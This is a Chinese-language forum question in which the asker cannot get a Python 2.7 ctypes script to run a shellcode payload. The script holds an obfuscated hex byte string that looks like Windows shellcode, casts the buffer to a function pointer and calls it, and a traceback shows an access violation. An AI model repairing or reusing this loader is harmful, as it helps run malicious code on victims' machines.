无法使用python ctypes执行有效负载

2024-09-28 20:52:10 发布

您现在位置:Python中文网/ 问答频道 /正文

我无法使用python2.7cTypes执行有效负载

我试着把ctypes.CFUNCTYPE改成ctypes.WINFUNCTYPE 但还是一样的回溯

import ctypes

# Our code goes here
rHfGjdSiJdK = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x53\xff\xd5");


# Push into memory
dEiTgKJDe = ctypes.create_string_buffer(rHfGjdSiJdK, len(rHfGjdSiJdK))
iKaiRSdDk = ctypes.cast(dEiTgKJDe, ctypes.CFUNCTYPE(ctypes.c_void_p))
iKaiRSdDk()

Traceback (most recent call last):
  File "shellcode.py", line 19, in <module>
    iKaiRSdDk()
WindowsError: exception: access violation writing 0x02FA9CE8

它应该执行


Tags: ctypesx00x01xffx8bcfunctypex0cx89